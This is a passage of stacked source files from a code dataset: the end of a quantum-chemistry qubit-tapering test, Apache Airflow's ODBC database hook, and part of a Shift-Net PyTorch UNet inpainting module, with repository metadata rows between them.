hamiltonian, spectrum = lih_hamiltonian()
qubit_hamiltonian = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
tapered_ham_0_3 = taper_off_qubits(qubit_hamiltonian, [stab1, stab2],
manual_input=True,
fixed_positions=[0, 3])
tapered_ham_2_1 = taper_off_qubits(qubit_hamiltonian, [stab1, stab2],
manual_input=True,
fixed_positions=[2, 1])
tapered_spectrum_0_3 = eigenspectrum(tapered_ham_0_3)
tapered_spectrum_2_1 = eigenspectrum(tapered_ham_2_1)
self.assertAlmostEqual(spectrum[0], tapered_spectrum_0_3[0])
self.assertAlmostEqual(spectrum[0], tapered_spectrum_2_1[0])
self.assertTrue(
numpy.allclose(tapered_spectrum_0_3, tapered_spectrum_2_1))
def test_tapering_qubits_remove_positions(self):
"""Test taper_off_qubits function using LiH Hamiltonian."""
hamiltonian, spectrum = lih_hamiltonian()
qubit_hamiltonian = jordan_wigner(hamiltonian)
stab1 = QubitOperator('Z0 Z2', -1.0)
stab2 = QubitOperator('Z1 Z3', -1.0)
(tapered_hamiltonian,
positions) = taper_off_qubits(operator=qubit_hamiltonian,
stabilizers=[stab1, stab2],
manual_input=True,
fixed_positions=[0, 3],
output_tapered_positions=True)
tapered_spectrum = eigenspectrum(tapered_hamiltonian)
self.assertAlmostEqual(spectrum[0], tapered_spectrum[0])
self.assertEqual(positions, [0, 3])
def test_tappering_stabilizer_more_qubits(self):
"""Test for stabilizer with more qubits than operator."""
hamiltonian = QubitOperator('Y0 Y1', 1.0)
stab = QubitOperator('X0 X1 X2', -1.0)
num_qubits = max(count_qubits(hamiltonian), count_qubits(stab))
tap_ham = taper_off_qubits(hamiltonian, stab)
num_qubits_tap = count_qubits(tap_ham)
self.assertFalse(num_qubits == num_qubits_tap)
hamiltonian = QubitOperator('X0 X1', 1.0)
stab = QubitOperator('Y0 Y1 Y2', -1.0)
num_qubits = max(count_qubits(hamiltonian), count_qubits(stab))
tap_ham = taper_off_qubits(hamiltonian, stab)
num_qubits_tap = count_qubits(tap_ham)
self.assertFalse(num_qubits == num_qubits_tap)
def test_taper_x_stab(self):
hamiltonian = QubitOperator('X0 X1', 1.0)
stab1 = QubitOperator('Y0 Y2', -1.0)
tham = reduce_number_of_terms(hamiltonian, stab1, maintain_length=True)
self.assertTrue(hamiltonian == tham)
| 44.570201
| 80
| 0.590743
|
09b090a2d2598161f683e6255d10399d40d8d766
| 8,064
|
py
|
Python
|
airflow/providers/odbc/hooks/odbc.py
|
omad/airflow
|
663259d4b541ab10ce55fec4d2460e23917062c2
|
[
"Apache-2.0"
] | 1
|
2021-07-07T15:13:51.000Z
|
2021-07-07T15:13:51.000Z
|
airflow/providers/odbc/hooks/odbc.py
|
omad/airflow
|
663259d4b541ab10ce55fec4d2460e23917062c2
|
[
"Apache-2.0"
] | 1
|
2020-10-15T22:39:05.000Z
|
2020-10-15T22:39:05.000Z
|
airflow/providers/odbc/hooks/odbc.py
|
tanjinP/airflow
|
f0b9aae564805fb09328faf0c47f441ee0699ed8
|
[
"Apache-2.0"
] | null | null | null |
# pylint: disable=c-extension-no-member
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module contains ODBC hook."""
from typing import Any, Optional
from urllib.parse import quote_plus
import pyodbc
from airflow.hooks.dbapi_hook import DbApiHook
from airflow.utils.helpers import merge_dicts
class OdbcHook(DbApiHook):
"""
Interact with odbc data sources using pyodbc.
See :ref:`apache-airflow:howto/connection/odbc` for full documentation.
"""
DEFAULT_SQLALCHEMY_SCHEME = 'mssql+pyodbc'
conn_name_attr = 'odbc_conn_id'
default_conn_name = 'odbc_default'
supports_autocommit = True
def __init__(
self,
*args,
database: Optional[str] = None,
driver: Optional[str] = None,
dsn: Optional[str] = None,
connect_kwargs: Optional[dict] = None,
sqlalchemy_scheme: Optional[str] = None,
**kwargs,
) -> None:
"""
:param args: passed to DbApiHook
:param database: database to use -- overrides connection ``schema``
:param driver: name of driver or path to driver. overrides driver supplied in connection ``extra``
:param dsn: name of DSN to use. overrides DSN supplied in connection ``extra``
:param connect_kwargs: keyword arguments passed to ``pyodbc.connect``
:param sqlalchemy_scheme: Scheme sqlalchemy connection. Default is ``mssql+pyodbc`` Only used for
``get_sqlalchemy_engine`` and ``get_sqlalchemy_connection`` methods.
:param kwargs: passed to DbApiHook
"""
super().__init__(*args, **kwargs)
self._database = database
self._driver = driver
self._dsn = dsn
self._conn_str = None
self._sqlalchemy_scheme = sqlalchemy_scheme
self._connection = None
self._connect_kwargs = connect_kwargs
@property
def connection(self):
"""``airflow.Connection`` object with connection id ``odbc_conn_id``"""
if not self._connection:
self._connection = self.get_connection(getattr(self, self.conn_name_attr))
return self._connection
@property
def database(self) -> Optional[str]:
"""Database provided in init if exists; otherwise, ``schema`` from ``Connection`` object."""
return self._database or self.connection.schema
@property
def sqlalchemy_scheme(self) -> Optional[str]:
"""Database provided in init if exists; otherwise, ``schema`` from ``Connection`` object."""
return (
self._sqlalchemy_scheme
or self.connection_extra_lower.get('sqlalchemy_scheme')
or self.DEFAULT_SQLALCHEMY_SCHEME
)
@property
def connection_extra_lower(self) -> dict:
"""
``connection.extra_dejson`` but where keys are converted to lower case.
This is used internally for case-insensitive access of odbc params.
"""
return {k.lower(): v for k, v in self.connection.extra_dejson.items()}
@property
def driver(self) -> Optional[str]:
"""Driver from init param if given; else try to find one in connection extra."""
if not self._driver:
driver = self.connection_extra_lower.get('driver')
if driver:
self._driver = driver
return self._driver and self._driver.strip().lstrip('{').rstrip('}').strip()
@property
def dsn(self) -> Optional[str]:
"""DSN from init param if given; else try to find one in connection extra."""
if not self._dsn:
dsn = self.connection_extra_lower.get('dsn')
if dsn:
self._dsn = dsn.strip()
return self._dsn
@property
def odbc_connection_string(self):
"""
ODBC connection string
We build connection string instead of using ``pyodbc.connect`` params because, for example, there is
no param representing ``ApplicationIntent=ReadOnly``. Any key-value pairs provided in
``Connection.extra`` will be added to the connection string.
"""
if not self._conn_str:
conn_str = ''
if self.driver:
conn_str += f"DRIVER={{{self.driver}}};"
if self.dsn:
conn_str += f"DSN={self.dsn};"
if self.connection.host:
conn_str += f"SERVER={self.connection.host};"
database = self.database or self.connection.schema
if database:
conn_str += f"DATABASE={database};"
if self.connection.login:
conn_str += f"UID={self.connection.login};"
if self.connection.password:
conn_str += f"PWD={self.connection.password};"
            if self.connection.port:
                conn_str += f"PORT={self.connection.port};"
extra_exclude = {'driver', 'dsn', 'connect_kwargs', 'sqlalchemy_scheme'}
extra_params = {
                k: v for k, v in self.connection.extra_dejson.items() if k.lower() not in extra_exclude
}
for k, v in extra_params.items():
conn_str += f"{k}={v};"
self._conn_str = conn_str
return self._conn_str
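    # Illustrative result (assumed connection values): with driver
    # "ODBC Driver 17 for SQL Server", host "my.host", schema "my_db",
    # login "user", password "pw" and extra {"ApplicationIntent": "ReadOnly"},
    # the property above yields roughly:
    #   DRIVER={ODBC Driver 17 for SQL Server};SERVER=my.host;DATABASE=my_db;UID=user;PWD=pw;ApplicationIntent=ReadOnly;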
@property
def connect_kwargs(self) -> dict:
"""
Returns effective kwargs to be passed to ``pyodbc.connect`` after merging between conn extra,
``connect_kwargs`` and hook init.
Hook ``connect_kwargs`` precedes ``connect_kwargs`` from conn extra.
String values for 'true' and 'false' are converted to bool type.
If ``attrs_before`` provided, keys and values are converted to int, as required by pyodbc.
"""
        def clean_bool(val):
            if hasattr(val, 'lower'):
                if val.lower() == 'true':
                    return True
                if val.lower() == 'false':
                    return False
            return val
conn_connect_kwargs = self.connection_extra_lower.get('connect_kwargs', {})
hook_connect_kwargs = self._connect_kwargs or {}
merged_connect_kwargs = merge_dicts(conn_connect_kwargs, hook_connect_kwargs)
if 'attrs_before' in merged_connect_kwargs:
merged_connect_kwargs['attrs_before'] = {
int(k): int(v) for k, v in merged_connect_kwargs['attrs_before'].items()
}
return {k: clean_bool(v) for k, v in merged_connect_kwargs.items()}
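    # Illustrative merge (assumed values): with connection extra
    # {"connect_kwargs": {"autocommit": "true", "timeout": 5}} and hook init
    # connect_kwargs={"timeout": 10}, this property returns
    # {"autocommit": True, "timeout": 10}: hook kwargs take precedence and the
    # string "true" is converted to a bool.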
def get_conn(self) -> pyodbc.Connection:
"""Returns a pyodbc connection object."""
conn = pyodbc.connect(self.odbc_connection_string, **self.connect_kwargs)
return conn
def get_uri(self) -> str:
"""URI invoked in :py:meth:`~airflow.hooks.dbapi_hook.DbApiHook.get_sqlalchemy_engine` method"""
quoted_conn_str = quote_plus(self.odbc_connection_string)
uri = f"{self.sqlalchemy_scheme}:///?odbc_connect={quoted_conn_str}"
return uri
def get_sqlalchemy_connection(
self, connect_kwargs: Optional[dict] = None, engine_kwargs: Optional[dict] = None
) -> Any:
"""Sqlalchemy connection object"""
engine = self.get_sqlalchemy_engine(engine_kwargs=engine_kwargs)
cnx = engine.connect(**(connect_kwargs or {}))
return cnx
| 39.529412
| 108
| 0.635417
|
33b7cb9af97ea021ec16ba64320a5e97d7bc7aec
| 31,792
|
py
|
Python
|
models/modules/shift_unet.py
|
qianbenb/Shift-Net_pytorch
|
c765939bed64b9604e9ea7ce2c14b2b2c69046d4
|
[
"MIT"
] | 1
|
2019-04-24T10:01:29.000Z
|
2019-04-24T10:01:29.000Z
|
models/modules/shift_unet.py
|
qianbenb/Shift-Net_pytorch
|
c765939bed64b9604e9ea7ce2c14b2b2c69046d4
|
[
"MIT"
] | null | null | null |
models/modules/shift_unet.py
|
qianbenb/Shift-Net_pytorch
|
c765939bed64b9604e9ea7ce2c14b2b2c69046d4
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
# For original shift
from models.shift_net.InnerShiftTriple import InnerShiftTriple
from models.shift_net.InnerCos import InnerCos
# For res shift
from models.res_shift_net.innerResShiftTriple import InnerResShiftTriple
# For pixel soft shift
from models.soft_shift_net.innerSoftShiftTriple import InnerSoftShiftTriple
# For patch patch shift
from models.patch_soft_shift.innerPatchSoftShiftTriple import InnerPatchSoftShiftTriple
# For res patch patch shift
from models.res_patch_soft_shift.innerResPatchSoftShiftTriple import InnerResPatchSoftShiftTriple
from .unet import UnetSkipConnectionBlock
from .modules import *
################################### *************************** #####################################
################################### Shift_net #####################################
################################### *************************** #####################################
# Defines the Unet generator.
# |num_downs|: number of downsamplings in UNet. For example,
# if |num_downs| == 7, image of size 128x128 will become of size 1x1
# at the bottleneck
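# For instance (assumed configuration): with |num_downs| == 8, a 256x256 input
# is halved eight times (256 -> 128 -> 64 -> ... -> 1) at the bottleneck.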
class UnetGeneratorShiftTriple(nn.Module):
def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
norm_layer=nn.BatchNorm2d, use_spectral_norm=False):
super(UnetGeneratorShiftTriple, self).__init__()
# construct unet structure
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer,
innermost=True, use_spectral_norm=use_spectral_norm)
print(unet_block)
        for i in range(num_downs - 5):  # The inner layers number is 3 (spatial size: 512*512), if unet_256.
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_shift_block = UnetSkipConnectionShiftBlock(ngf * 2, ngf * 4, opt, innerCos_list, shift_list,
mask_global, input_nc=None, \
submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm, layer_to_last=3) # passing in unet_shift_block
unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_shift_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
self.model = unet_block
def forward(self, input):
return self.model(input)
# Note: the TripleBlock differs in its `upconv` definition.
# 'cos' means that we add an `innerCos` layer in the block.
class UnetSkipConnectionShiftBlock(nn.Module):
def __init__(self, outer_nc, inner_nc, opt, innerCos_list, shift_list, mask_global, input_nc, \
submodule=None, shift_layer=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d,
use_spectral_norm=False, layer_to_last=3):
super(UnetSkipConnectionShiftBlock, self).__init__()
self.outermost = outermost
if input_nc is None:
input_nc = outer_nc
downconv = spectral_norm(nn.Conv2d(input_nc, inner_nc, kernel_size=4,
stride=2, padding=1), use_spectral_norm)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc)
# As the downconv layer is outer_nc in and inner_nc out.
        # So the shift is defined like this:
shift = InnerShiftTriple(opt.shift_sz, opt.stride, opt.mask_thred,
opt.triple_weight, layer_to_last=layer_to_last)
shift.set_mask(mask_global)
shift_list.append(shift)
# Add latent constraint
# Then add the constraint to the constrain layer list!
innerCos = InnerCos(strength=opt.strength, skip=opt.skip, layer_to_last=layer_to_last)
innerCos.set_mask(mask_global) # Here we need to set mask for innerCos layer too.
innerCos_list.append(innerCos)
# Different position only has differences in `upconv`
# for the outermost, the special is `tanh`
if outermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
# for the innermost, the special is `inner_nc` instead of `inner_nc*2`
elif innermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv] # for the innermost, no submodule, and delete the bn
up = [uprelu, upconv, upnorm]
model = down + up
# else, the normal
else:
# shift triple differs in here. It is `*3` not `*2`.
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 3, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv, downnorm]
# shift should be placed after uprelu
            # NB: innerCos is placed before shift, so the latent gradient is
            # added to the former part.
up = [uprelu, innerCos, shift, upconv, upnorm]
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost: # if it is the outermost, directly pass the input in.
return self.model(x)
else:
x_latter = self.model(x)
_, _, h, w = x.size()
if h != x_latter.size(2) or w != x_latter.size(3):
x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
return torch.cat([x_latter, x], 1) # cat in the C channel
################################### *************************** #####################################
################################### Res Shift_net #####################################
################################### *************************** #####################################
# Defines the Unet generator.
# |num_downs|: number of downsamplings in UNet. For example,
# if |num_downs| == 7, image of size 128x128 will become of size 1x1
# at the bottleneck
class ResUnetGeneratorShiftTriple(nn.Module):
def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
norm_layer=nn.BatchNorm2d, use_spectral_norm=False):
super(ResUnetGeneratorShiftTriple, self).__init__()
# construct unet structure
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer,
innermost=True, use_spectral_norm=use_spectral_norm)
print(unet_block)
        for i in range(num_downs - 5):  # The inner layers number is 3 (spatial size: 512*512), if unet_256.
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_shift_block = ResUnetSkipConnectionBlock(ngf * 2, ngf * 4, opt, innerCos_list, shift_list,
mask_global, input_nc=None, \
submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm, layer_to_last=3) # passing in unet_shift_block
unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_shift_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
self.model = unet_block
def forward(self, input):
return self.model(input)
# Note: the TripleBlock differs in its `upconv` definition.
# 'cos' means that we add an `innerCos` layer in the block.
class ResUnetSkipConnectionBlock(nn.Module):
def __init__(self, outer_nc, inner_nc, opt, innerCos_list, shift_list, mask_global, input_nc, \
submodule=None, shift_layer=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d,
use_spectral_norm=False, layer_to_last=3):
super(ResUnetSkipConnectionBlock, self).__init__()
self.outermost = outermost
if input_nc is None:
input_nc = outer_nc
downconv = spectral_norm(nn.Conv2d(input_nc, inner_nc, kernel_size=4,
stride=2, padding=1), use_spectral_norm)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc)
# As the downconv layer is outer_nc in and inner_nc out.
        # So the shift is defined like this:
shift = InnerResShiftTriple(inner_nc, opt.shift_sz, opt.stride, opt.mask_thred,
opt.triple_weight, layer_to_last=layer_to_last)
shift.set_mask(mask_global)
shift_list.append(shift)
# Add latent constraint
# Then add the constraint to the constrain layer list!
innerCos = InnerCos(strength=opt.strength, skip=opt.skip, layer_to_last=layer_to_last)
innerCos.set_mask(mask_global) # Here we need to set mask for innerCos layer too.
innerCos_list.append(innerCos)
# Different position only has differences in `upconv`
# for the outermost, the special is `tanh`
if outermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
# for the innermost, the special is `inner_nc` instead of `inner_nc*2`
elif innermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv] # for the innermost, no submodule, and delete the bn
up = [uprelu, upconv, upnorm]
model = down + up
# else, the normal
else:
# Res shift differs with other shift here. It is `*2` not `*3`.
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv, downnorm]
# shift should be placed after uprelu
            # NB: innerCos is placed before shift, so the latent gradient is
            # added to the former part.
up = [uprelu, innerCos, shift, upconv, upnorm]
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost: # if it is the outermost, directly pass the input in.
return self.model(x)
else:
x_latter = self.model(x)
_, _, h, w = x.size()
if h != x_latter.size(2) or w != x_latter.size(3):
x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
return torch.cat([x_latter, x], 1) # cat in the C channel
################################### *************************** #####################################
################################### Soft pixel shift #####################################
################################### *************************** #####################################
class SoftUnetGeneratorShiftTriple(nn.Module):
def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
norm_layer=nn.BatchNorm2d, use_spectral_norm=False):
super(SoftUnetGeneratorShiftTriple, self).__init__()
# construct unet structure
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer,
innermost=True, use_spectral_norm=use_spectral_norm)
print(unet_block)
        for i in range(num_downs - 5):  # The number of inner layers is 3 (spatial size: 512*512) for unet_256.
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_shift_block = SoftUnetSkipConnectionBlock(ngf * 2, ngf * 4, opt, innerCos_list, shift_list,
mask_global, input_nc=None, \
submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm, layer_to_last=3) # passing in unet_shift_block
unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_shift_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
self.model = unet_block
def forward(self, input):
return self.model(input)
# construct network from the inside to the outside.
# Defines the submodule with skip connection.
# X -------------------identity---------------------- X
# |-- downsampling -- |submodule| -- upsampling --|
class SoftUnetSkipConnectionBlock(nn.Module):
def __init__(self, outer_nc, inner_nc, opt, innerCos_list, shift_list, mask_global, input_nc, \
submodule=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_spectral_norm=False, layer_to_last=3):
super(SoftUnetSkipConnectionBlock, self).__init__()
self.outermost = outermost
if input_nc is None:
input_nc = outer_nc
downconv = spectral_norm(nn.Conv2d(input_nc, inner_nc, kernel_size=4,
stride=2, padding=1), use_spectral_norm)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc)
        # As the downconv layer takes outer_nc in and gives inner_nc out,
        # the shift is defined like this:
shift = InnerSoftShiftTriple(opt.shift_sz, opt.stride, opt.mask_thred, opt.triple_weight, layer_to_last=layer_to_last)
shift.set_mask(mask_global)
shift_list.append(shift)
# Add latent constraint
# Then add the constraint to the constrain layer list!
innerCos = InnerCos(strength=opt.strength, skip=opt.skip, layer_to_last=layer_to_last)
innerCos.set_mask(mask_global) # Here we need to set mask for innerCos layer too.
innerCos_list.append(innerCos)
# Different position only has differences in `upconv`
# for the outermost, the special is `tanh`
if outermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
# for the innermost, the special is `inner_nc` instead of `inner_nc*2`
elif innermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv] # for the innermost, no submodule, and delete the bn
up = [uprelu, upconv, upnorm]
model = down + up
# else, the normal
else:
# shift triple differs in here. It is `*3` not `*2`.
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 3, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv, downnorm]
            # The shift should be placed after uprelu.
            # NB: innerCos is placed before shift, so the latent gradient is
            # added to the former part.
up = [uprelu, innerCos, shift, upconv, upnorm]
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost: # if it is the outermost, directly pass the input in.
return self.model(x)
else:
x_latter = self.model(x)
_, _, h, w = x.size()
if h != x_latter.size(2) or w != x_latter.size(3):
x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
return torch.cat([x_latter, x], 1) # cat in the C channel
################################### *************************** #####################################
################################### patch soft shift_net #####################################
################################### *************************** #####################################
# Defines the Unet generator.
# |num_downs|: number of downsamplings in UNet. For example,
# if |num_downs| == 7, image of size 128x128 will become of size 1x1
# at the bottleneck
class PatchSoftUnetGeneratorShiftTriple(nn.Module):
def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
norm_layer=nn.BatchNorm2d, use_spectral_norm=False):
super(PatchSoftUnetGeneratorShiftTriple, self).__init__()
# construct unet structure
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer,
innermost=True, use_spectral_norm=use_spectral_norm)
print(unet_block)
        for i in range(num_downs - 5):  # The number of inner layers is 3 (spatial size: 512*512) for unet_256.
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_shift_block = PatchSoftUnetSkipConnectionShiftTriple(ngf * 2, ngf * 4, opt, innerCos_list, shift_list,
mask_global, input_nc=None, \
submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm, layer_to_last=3) # passing in unet_shift_block
unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_shift_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
self.model = unet_block
def forward(self, input):
return self.model(input)
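# --- Illustrative sketch (added for exposition; not part of the original file).
# Each UNet level halves the spatial size, which is why the comments on these
# generators note that with num_downs == 7 a 128x128 image reaches 1x1 at the
# bottleneck.
def _demo_bottleneck_size():
    for num_downs, side in [(7, 128), (8, 256)]:
        assert side // (2 ** num_downs) == 1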
# Note: the TripleBlock differs in its `upconv` definition.
# 'cos' means that we add an `innerCos` layer in the block.
class PatchSoftUnetSkipConnectionShiftTriple(nn.Module):
def __init__(self, outer_nc, inner_nc, opt, innerCos_list, shift_list, mask_global, input_nc, \
submodule=None, shift_layer=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d,
use_spectral_norm=False, layer_to_last=3):
super(PatchSoftUnetSkipConnectionShiftTriple, self).__init__()
self.outermost = outermost
if input_nc is None:
input_nc = outer_nc
downconv = spectral_norm(nn.Conv2d(input_nc, inner_nc, kernel_size=4,
stride=2, padding=1), use_spectral_norm)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc)
        # As the downconv layer takes outer_nc in and gives inner_nc out,
        # the shift is defined like this:
shift = InnerPatchSoftShiftTriple(opt.shift_sz, opt.stride, opt.mask_thred,
opt.triple_weight, opt.fuse, layer_to_last=layer_to_last)
shift.set_mask(mask_global)
shift_list.append(shift)
# Add latent constraint
# Then add the constraint to the constrain layer list!
innerCos = InnerCos(strength=opt.strength, skip=opt.skip, layer_to_last=layer_to_last)
innerCos.set_mask(mask_global) # Here we need to set mask for innerCos layer too.
innerCos_list.append(innerCos)
# Different position only has differences in `upconv`
# for the outermost, the special is `tanh`
if outermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
# for the innermost, the special is `inner_nc` instead of `inner_nc*2`
elif innermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv] # for the innermost, no submodule, and delete the bn
up = [uprelu, upconv, upnorm]
model = down + up
# else, the normal
else:
# shift triple differs in here. It is `*3` not `*2`.
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 3, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv, downnorm]
            # The shift should be placed after uprelu.
            # NB: innerCos is placed before shift, so the latent gradient is
            # added to the former part.
up = [uprelu, innerCos, shift, upconv, upnorm]
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost: # if it is the outermost, directly pass the input in.
return self.model(x)
else:
x_latter = self.model(x)
_, _, h, w = x.size()
if h != x_latter.size(2) or w != x_latter.size(3):
x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
return torch.cat([x_latter, x], 1) # cat in the C channel
################################### *************************** #####################################
################################### Res patch soft shift_net #####################################
################################### *************************** #####################################
# Defines the Unet generator.
# |num_downs|: number of downsamplings in UNet. For example,
# if |num_downs| == 7, image of size 128x128 will become of size 1x1
# at the bottleneck
class ResPatchSoftUnetGeneratorShiftTriple(nn.Module):
def __init__(self, input_nc, output_nc, num_downs, opt, innerCos_list, shift_list, mask_global, ngf=64,
norm_layer=nn.BatchNorm2d, use_spectral_norm=False):
super(ResPatchSoftUnetGeneratorShiftTriple, self).__init__()
# construct unet structure
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer,
innermost=True, use_spectral_norm=use_spectral_norm)
print(unet_block)
        for i in range(num_downs - 5):  # The number of inner layers is 3 (spatial size: 512*512) for unet_256.
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_shift_block = ResPatchSoftUnetSkipConnectionShiftTriple(ngf * 2, ngf * 4, opt, innerCos_list, shift_list,
mask_global, input_nc=None, \
submodule=unet_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm, layer_to_last=3) # passing in unet_shift_block
